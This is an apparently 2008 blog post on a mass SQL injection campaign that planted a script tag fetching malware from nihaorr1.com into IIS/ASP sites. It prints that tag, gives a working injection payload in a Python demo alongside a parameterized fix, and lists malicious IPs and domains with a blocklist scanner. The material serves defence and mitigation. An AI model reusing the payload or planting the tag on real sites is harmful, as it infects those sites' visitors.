What the hack is this nihaorr1.com/1.js? – updated Apr.19


Found anything special in the following Google search results?
    
Yes: except for the 3rd link, which points to the IIS.net forum, every destination in the search results has been compromised.  The code between <script src= … and … </script> was planted into the content of those websites by some malicious hacking mechanism, without the webmasters’ awareness.  Do NOT click on any of those links!!!

This thread in the IIS.net forum, Anyone know about www.nihaorr1.com/1.js?, tells part of the story through a few people comparing their findings.  Basically, once a website has been compromised, a visitor who opens a page carrying the implanted code causes the browser to fetch 1.js from www.nihaorr1.com and execute it.  Most web visitors would not notice anything except something like "Page cannot be found" shown in the browser, which doesn’t look harmful.  But by then the code has already run on their PCs.  So far, I saw test.exe, 1.js and Yahoo.php pulled from that website to the clients.  Those files are executable; if you have antivirus software installed with up-to-date definitions, they will be quarantined; if you don’t, I don’t know …

Webmasters, especially those who run IIS, use ASP code and have a SQL database in the backend: check your servers, code and databases.  Thousands of websites have been compromised, as the Google search results show.  There is no official information yet, but I personally quite agree with rwmorey, eftennis and davcox’s comments in http://forums.iis.net/p/1148917/1867622.aspx.  I will also add new findings in the next few days. [Apr.18]

There are 2 more domains that may serve the same malicious code: aspder.com and 414151.com.  From somewhere, hackers are trying to plant the code in your web server or SQL database, so that your visitors’ browsers load content from those sites and probably get infected.

Here are more details found in the Malware Domain Blocklist:

The IP address 60.172.219.4 contains

414151..com and a new domain, aspder..com

Source: http://www.robtex.com/ip/60.172.219.4.html

aspder..com resolves, and there are iframes popping up in google:

http://www.google.com/search?q=aspder.com

Needless to say, block this IP and domain. If anyone can download and analyze the iframe, we would appreciate more information. Thanks.

UPDATE: it’s a sql injection attack, see these links for more detail:

http://www.webhostingtalk.com/showthread.php?t=686032
http://www.webhostingtalk.com/showthread.php?p=5062187

These posts also mention twww..nihaorr1..com/1.js

Also in those threads at Web Hosting Talk (the two links above) there are more details about how the hackers plant the code in your web servers and SQL servers.  The following is copied from that site:

Here is a link to shed light on the problem and how to mitigate it –

http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx

Many high profile sites got hit by the injection of early April and also one in early March. Sites like usatoday-dot-com, forbes-dot-com, walmart-dot-com, and on and on. Several thousand sites got hit.

Here are some more links about it –

http://myitforum.com/cs2/blogs/cmosby/archive/2008/04/04/nmidahena-sans-internet-storm-center.aspx

http://isc.sans.org/diary.html?storyid=4210

http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html
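The threads quoted above put the planting mechanism down to SQL injection: a page builds its SQL by pasting request values into the statement text, and one crafted value rewrites the statement so that the script tag gets appended to the content of every row. The following Python/sqlite3 example is added here to illustrate that; it is not code from this post or from the forum threads. The articles table, the hypothetical edit handler and the payload are constructed for the demonstration (the real campaign's payload is not on this page and is not reproduced); the tag that gets appended is the one quoted at the top of this post.

```python
import sqlite3

# The tag quoted at the top of this post, i.e. what ended up inside the
# compromised pages' content.
INJECTED_TAG = "<script src=http://www.nihaorr1.com/1.js></script>"

# Constructed sample content standing in for a site's database-backed pages.
SEED = {1: "Hello world", 2: "Second post", 3: "Who we are"}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", SEED.items())
    conn.commit()
    return conn


def update_body_vulnerable(conn, article_id, body):
    """Hypothetical edit handler that splices request values straight into
    the statement text, the way classic ASP built SQL with & concatenation.
    The page intends to change one row; the request decides what really runs."""
    sql = "UPDATE articles SET body = '" + body + "' WHERE id = " + str(article_id)
    conn.execute(sql)
    conn.commit()


def update_body_safe(conn, article_id, body):
    """Same operation as a parameterized statement: body and id are passed as
    values, so quotes or keywords inside them can never alter the query."""
    conn.execute("UPDATE articles SET body = ? WHERE id = ?", (body, article_id))
    conn.commit()


# Constructed, illustrative payload: closes the string literal, makes the new
# body "old body + tag", widens the WHERE to every row, and comments out the
# handler's own WHERE clause. The real campaign's payload is not on this page.
PAYLOAD = "' || body || '" + INJECTED_TAG + "' WHERE 1=1 --"


def changed_rows(conn):
    """Ids whose body no longer matches the seed data."""
    return [rid for rid, body in conn.execute("SELECT id, body FROM articles ORDER BY id")
            if body != SEED[rid]]


def infected_rows(conn):
    """Cleanup check a webmaster would run over text columns: rows whose
    content ends with the planted tag."""
    return [rid for rid, body in conn.execute("SELECT id, body FROM articles ORDER BY id")
            if body.endswith(INJECTED_TAG)]


def demo():
    vuln = make_db()
    update_body_vulnerable(vuln, 3, PAYLOAD)   # attacker "edits" article 3 only
    safe = make_db()
    update_body_safe(safe, 3, PAYLOAD)
    return {
        "vulnerable_changed": changed_rows(vuln),    # every row was rewritten
        "vulnerable_infected": infected_rows(vuln),  # and every row carries the tag
        "safe_changed": changed_rows(safe),          # only the intended row
        "safe_infected": infected_rows(safe),        # payload sits in row 3 as inert text
        "safe_row3": safe.execute("SELECT body FROM articles WHERE id = 3").fetchone()[0],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

In the vulnerable path the single "edit" touches all three rows and each now ends with the tag, which is exactly the symptom in the Google results above. In the parameterized path only row 3 changes and its body is the payload string verbatim; it still has to be escaped when rendered, but the database was never rewritten.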

Block the following on your proxy servers, home routers and other Internet gateway devices, so your users will not get infected when a website they visit is compromised.  Besides the web and SQL servers themselves, this is how you control the controllable as a server/network administrator.

IPs
60.172.219.4
24.28.193.9
219.153.46.28

Domains
aspder.com
*.aspder.com
nihaorr1.com
*.nihaorr1.com
414151.com
*.414151.com
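As an added example (not part of the original post), here is how a gateway filter or a page scanner would apply the list above: exact IP match, exact domain, or any subdomain of it, so that www.nihaorr1.com is caught but a lookalike such as notnihaorr1.com is not. Only the IPs and domains come from the list; the sample HTML, the hostnames in it and the function names are constructed for the demonstration.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Indicators exactly as listed on this page. Each domain also covers *.domain.
BLOCKED_IPS = {"60.172.219.4", "24.28.193.9", "219.153.46.28"}
BLOCKED_DOMAINS = {"aspder.com", "nihaorr1.com", "414151.com"}


def host_of(url):
    """Lowercase hostname of a URL without the port. A scheme is assumed when
    missing, since src values without one are common in planted tags."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").rstrip(".")


def is_blocked(url):
    """Gateway decision: exact IP, exact domain, or any subdomain of it.
    Matching on '.' + domain keeps lookalikes such as notnihaorr1.com out."""
    host = host_of(url)
    if not host:
        return False
    try:
        return str(ip_address(host)) in BLOCKED_IPS
    except ValueError:
        pass  # not an IP literal; fall through to the domain check
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


# <script> and <iframe> src attributes, quoted or unquoted (the planted tag
# on this page used the unquoted form).
SRC_RE = re.compile(
    r"<(script|iframe)\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)


def find_blocked_references(html):
    """Scan a fetched page for script/iframe sources on the blocklist.
    Returns (tag, url) pairs in document order."""
    hits = []
    for m in SRC_RE.finditer(html):
        url = m.group(2) or m.group(3) or m.group(4) or ""
        if is_blocked(url):
            hits.append((m.group(1).lower(), url))
    return hits


# Constructed sample page: two legitimate includes, the planted tag, a hidden
# iframe to one of the other listed domains, a script served by IP and port,
# and a lookalike domain that must not match.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="http://cdn.example.com/jquery.js"></script>
</head><body>
<p>Welcome<script src=http://www.nihaorr1.com/1.js></script></p>
<iframe src="http://aspder.com/a.htm" width=0 height=0></iframe>
<script src='http://60.172.219.4:8080/x.js'></script>
<script src="http://notnihaorr1.com/ok.js"></script>
</body></html>"""


if __name__ == "__main__":
    for tag, url in find_blocked_references(SAMPLE_HTML):
        print(f"blocked {tag}: {url}")
```

Run against the sample page this reports the nihaorr1.com script, the aspder.com iframe and the script fetched from 60.172.219.4, and nothing else. The same is_blocked() decision is what a proxy ACL or router rule built from the list above should implement; a plain substring match on the domain names would also catch the lookalike and miss the IP-addressed variant.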

Microsoft also published security advisory 951306; not sure if it’s relevant, need to test and prove.  [Apr.19]